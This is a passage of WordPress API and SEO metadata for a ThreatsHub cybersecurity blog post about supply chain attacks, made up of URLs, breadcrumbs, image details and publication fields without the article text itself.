News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"width\":1428,\"height\":446},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","og_locale":"en_US","og_type":"article","og_title":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-08-04T00:00:00+00:00","og_image":[{"width":1428,"height":446,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst","datePublished":"2021-08-04T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/"},"wordCount":1639,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : Ransomware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","name":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","datePublished":"2021-08-04T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","width":1428,"height":446},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/42142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=42142"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/42142\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/42143"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=42142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=42142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=42142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}